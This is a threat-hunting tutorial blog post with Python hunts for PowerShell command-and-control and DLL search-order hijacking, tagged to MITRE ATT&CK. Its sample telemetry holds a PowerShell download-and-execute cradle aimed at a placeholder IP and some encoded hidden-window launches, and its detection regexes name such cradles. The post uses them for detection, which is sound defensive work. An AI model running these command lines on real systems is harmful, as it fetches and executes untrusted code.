丁久

Posted on • Originally published at dingjiu1989-hue.github.io

Threat Hunting

This article was originally published on AI Study Room. For the full version with working code examples and related articles, visit the original post.

Introduction

Threat hunting is the proactive, analyst-driven search for malicious activity that has evaded existing security controls. Unlike automated detection, which fires only on what it was already told to look for, hunting is hypothesis-driven and iterative: it assumes adversaries are already inside the network and tries to find them before they reach their objectives.

The Hunting Maturity Model

The Hunting Maturity Model (HMM) describes an organization's hunting capability across five levels:

  • HMM0 — Initial: Relies on automated alerts only; no proactive hunting

  • HMM1 — Minimal: IOC-based hunting using threat intelligence feeds

  • HMM2 — Procedural: Hunting follows documented procedures

  • HMM3 — Innovative: Creates novel data analysis techniques

  • HMM4 — Leading: Automates successful hunting procedures so analysts can spend their time on new hypotheses

Hypothesis-Driven Hunting

The hypothesis is the foundation of every hunt. It should be testable, specific, and grounded in threat intelligence or risk assessment.

```python
import re
from dataclasses import dataclass

# Hypothesis: an adversary is using PowerShell for C2 communication.
# Test: find PowerShell processes making outbound connections on common web
# ports, then inspect their command lines for suspicious patterns.

# Command-line patterns worth a closer look: encoded commands, download
# cradles, hidden windows.
suspicious_patterns = re.compile(
    r"(?i)(-e(?:nc|ncodedcommand)?\s|downloadstring|invoke-expression|\biex\b|-w(?:indowstyle)?\s+hidden)"
)


@dataclass
class HuntingFinding:
    hypothesis: str
    evidence: object  # the telemetry row that matched
    severity: str


def hunt_powershell_c2(execute_hunt, time_window_hours=72):
    """Run the hunt query through a telemetry backend and yield findings.

    `execute_hunt` is the site-specific query function, assumed to return rows
    with attribute access; it is passed in so the hunt stays backend-agnostic.
    """
    hours = int(time_window_hours)  # cast before interpolation so the window cannot inject SQL
    query = f"""
        SELECT p.pid, p.command_line, p.start_time,
               u.username, h.dest_ip, h.dest_port
        FROM processes p
        JOIN users u ON p.user_id = u.id
        JOIN network_connections h ON p.pid = h.pid
        WHERE p.name = 'powershell.exe'
          AND h.dest_port IN (80, 443, 8080)
          AND p.start_time > NOW() - INTERVAL '{hours} hours'
          AND p.command_line NOT LIKE '%WindowsPowerShell%'
    """
    # Note: the stock binary's full path contains 'WindowsPowerShell', so the
    # exclusion above must be tuned to how command_line is recorded in your data.
    for row in execute_hunt(query):
        # search(), not match(): the indicator can appear anywhere in the command line
        if suspicious_patterns.search(row.command_line):
            yield HuntingFinding(hypothesis="PowerShell C2", evidence=row, severity="high")
```
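The hunt above needs a live telemetry backend to run. The following is an added example, not code from the original post or its author, that tests the same PowerShell C2 hypothesis fully offline: it joins constructed process-creation and network-connection events on pid the way the SQL does, applies the time window, and scores each command line with weighted indicators rather than a single yes/no match, so an execution-policy bypass on an internal patch server ranks below an encoded, hidden-window launch to an external host. The event shape, indicator weights, internal address ranges and severity thresholds are assumptions for illustration.

```python
import ipaddress
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample telemetry (not real data), shaped like a join of
# process-creation and network-connection events keyed on pid.
PROCESS_EVENTS = [
    {"pid": 4412, "name": "powershell.exe", "user": "CORP\\jdoe", "start_time": "2024-05-01T09:14:02",
     "command_line": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"pid": 5120, "name": "powershell.exe", "user": "CORP\\svc_patch", "start_time": "2024-05-01T09:20:45",
     "command_line": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\patch-report.ps1"},
    {"pid": 6001, "name": "powershell.exe", "user": "CORP\\alice", "start_time": "2024-05-01T09:30:00",
     "command_line": "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')\""},
    {"pid": 6100, "name": "powershell.exe", "user": "CORP\\bob", "start_time": "2024-04-20T08:00:00",
     "command_line": "powershell.exe -enc QQBCAEMA"},  # older than the hunt window
    {"pid": 7000, "name": "cmd.exe", "user": "CORP\\alice", "start_time": "2024-05-01T09:31:00",
     "command_line": "cmd.exe /c whoami"},
]
NETWORK_EVENTS = [
    {"pid": 4412, "dest_ip": "198.51.100.23", "dest_port": 443},
    {"pid": 5120, "dest_ip": "10.0.0.5", "dest_port": 8080},  # internal patch server
    {"pid": 6001, "dest_ip": "203.0.113.7", "dest_port": 80},
    {"pid": 6100, "dest_ip": "203.0.113.8", "dest_port": 443},
    {"pid": 7000, "dest_ip": "203.0.113.9", "dest_port": 443},
]

# Weighted command-line indicators (weights are an assumption): encoded commands
# and download cradles count more than a bare execution-policy bypass.
INDICATORS = {
    "encoded_command": (re.compile(r"(?i)\s-e(?:c|nc|ncodedcommand)?\s"), 2),
    "download_cradle": (re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b"), 2),
    "hidden_window": (re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), 1),
    "no_profile": (re.compile(r"(?i)-nop(?:rofile)?\b"), 1),
    "policy_bypass": (re.compile(r"(?i)-e(?:p|xecutionpolicy)\s+bypass"), 1),
}
C2_PORTS = {80, 443, 8080}  # the hypothesis scopes itself to common web ports
# Assumed organisation-internal ranges; destinations outside them add weight.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


@dataclass
class HuntingFinding:
    hypothesis: str
    pid: int
    user: str
    command_line: str
    dest: str
    indicators: list
    score: int
    severity: str


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def score_command_line(cmd):
    """Return (matched indicator names, total weight) for one command line."""
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(cmd)]
    return hits, sum(INDICATORS[h][1] for h in hits)


def hunt_powershell_c2(process_events, network_events, time_window_hours=72, now=None):
    now = now or datetime.now()
    cutoff = now - timedelta(hours=time_window_hours)
    conns_by_pid = {}
    for c in network_events:  # the JOIN ... ON p.pid = h.pid step
        conns_by_pid.setdefault(c["pid"], []).append(c)
    findings = []
    for p in process_events:
        if p["name"].lower() != "powershell.exe" or datetime.fromisoformat(p["start_time"]) <= cutoff:
            continue
        for c in conns_by_pid.get(p["pid"], []):
            if c["dest_port"] not in C2_PORTS:
                continue
            hits, score = score_command_line(p["command_line"])
            if not is_internal(c["dest_ip"]):
                hits.append("external_destination")
                score += 1
            if score == 0:
                continue  # plain PowerShell talking to an internal host: nothing to chase
            severity = "high" if score >= 3 else "medium" if score == 2 else "low"
            findings.append(HuntingFinding("PowerShell C2", p["pid"], p["user"], p["command_line"],
                                           f"{c['dest_ip']}:{c['dest_port']}", hits, score, severity))
    return findings


def run_sample():
    """Run the hunt over the constructed events with a fixed clock so results are reproducible."""
    return hunt_powershell_c2(PROCESS_EVENTS, NETWORK_EVENTS, now=datetime(2024, 5, 1, 12, 0, 0))


if __name__ == "__main__":
    for f in run_sample():
        print(f.severity, f.pid, f.user, f.dest, f.indicators)
```

The port filter is a choice the hypothesis makes, not a property of C2: a beacon on 4444 or over DNS never enters this hunt, which is exactly why each hunt should state its scope and be paired with a sibling hypothesis for what it excludes.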

MITRE ATT&CK Mapping

The MITRE ATT&CK framework provides a common taxonomy for adversary behavior. Tagging each hunt with the technique it tests makes coverage measurable: a catalogue of hunts keyed by technique shows which tactics are exercised regularly and which have never been hunted.

```yaml
hunt:
  name: "DLL Search Order Hijacking"
  technique_id: T1574.001
  tactic: [Persistence, Privilege Escalation]
```
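To show what the hunt named in that definition looks like when it runs, here is an added example (mine, not from the original post) that carries the technique_id and tactics from the hunt definition through to every finding, so results can be rolled up per technique. It flags copies of commonly hijacked Windows DLLs loaded from outside the system directories, ranking unsigned copies highest and third-party-signed copies next. The DLL list, the image-load event shape (modelled on the fields of Sysmon Event ID 7), the system-directory list and the severity tiers are assumptions for illustration, and the events are constructed.

```python
import ntpath
from dataclasses import dataclass

# Hunt definition mirroring the YAML mapping above.
HUNT = {
    "name": "DLL Search Order Hijacking",
    "technique_id": "T1574.001",
    "tactic": ["Persistence", "Privilege Escalation"],
}

# Assumption for illustration: DLLs that many signed binaries load by bare
# name and that are therefore frequent hijack targets. Extend from telemetry.
HIJACKABLE_DLLS = {"version.dll", "dbghelp.dll", "wtsapi32.dll", "cryptsp.dll",
                   "userenv.dll", "profapi.dll", "dwmapi.dll"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")

# Constructed image-load events (fields modelled on Sysmon Event ID 7; not real data).
IMAGE_LOADS = [
    {"image": "C:\\Program Files\\Vendor\\app.exe",
     "image_loaded": "C:\\Windows\\System32\\version.dll", "signed": True, "signer": "Microsoft Windows"},
    {"image": "C:\\Users\\bob\\AppData\\Local\\Temp\\update.exe",
     "image_loaded": "C:\\Users\\bob\\AppData\\Local\\Temp\\version.dll", "signed": False, "signer": ""},
    {"image": "C:\\Program Files\\Vendor\\app.exe",
     "image_loaded": "C:\\Program Files\\Vendor\\vendorlib.dll", "signed": False, "signer": ""},
    {"image": "C:\\Users\\bob\\Downloads\\tool.exe",
     "image_loaded": "C:\\Users\\bob\\Downloads\\dbghelp.dll", "signed": True, "signer": "Contoso Ltd"},
    {"image": "C:\\Program Files\\Vendor\\app.exe",
     "image_loaded": "C:\\Program Files\\Vendor\\dbghelp.dll", "signed": True, "signer": "Microsoft Corporation"},
]


@dataclass
class Finding:
    technique_id: str
    tactic: list
    process: str
    dll: str
    severity: str
    reason: str


def is_system_path(path):
    return path.lower().startswith(SYSTEM_DIRS)


def hunt_dll_hijack(events, hunt=HUNT):
    """Flag hijackable DLL names loaded from outside the system directories."""
    findings = []
    for e in events:
        dll = e["image_loaded"]
        if ntpath.basename(dll).lower() not in HIJACKABLE_DLLS or is_system_path(dll):
            continue
        if not e["signed"]:
            severity, reason = "high", "unsigned copy of a Windows DLL outside the system directories"
        elif "microsoft" not in e["signer"].lower():
            severity, reason = "medium", f"Windows DLL name signed by {e['signer']}"
        else:
            severity, reason = "low", "Microsoft-signed DLL loaded from a non-system path"
        # Classic side-loading: the DLL sits next to the executable that loaded it.
        if ntpath.dirname(dll).lower() == ntpath.dirname(e["image"]).lower():
            reason += "; loaded from the executable's own directory"
        findings.append(Finding(hunt["technique_id"], hunt["tactic"], e["image"], dll, severity, reason))
    return findings


def count_by_technique(findings):
    """Roll findings up per ATT&CK technique, the view compared against the hunt catalogue."""
    counts = {}
    for f in findings:
        counts[f.technique_id] = counts.get(f.technique_id, 0) + 1
    return counts


if __name__ == "__main__":
    results = hunt_dll_hijack(IMAGE_LOADS)
    for f in results:
        print(f.severity, f.technique_id, f.process, "->", f.dll, "|", f.reason)
    print(count_by_technique(results))
```

The Microsoft-signed case is deliberately kept as a low finding rather than dropped: redistributed copies of dbghelp.dll are common, but a signed DLL in a user-writable directory is still a hijack opportunity, and the low tier records that the hunt looked and decided.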

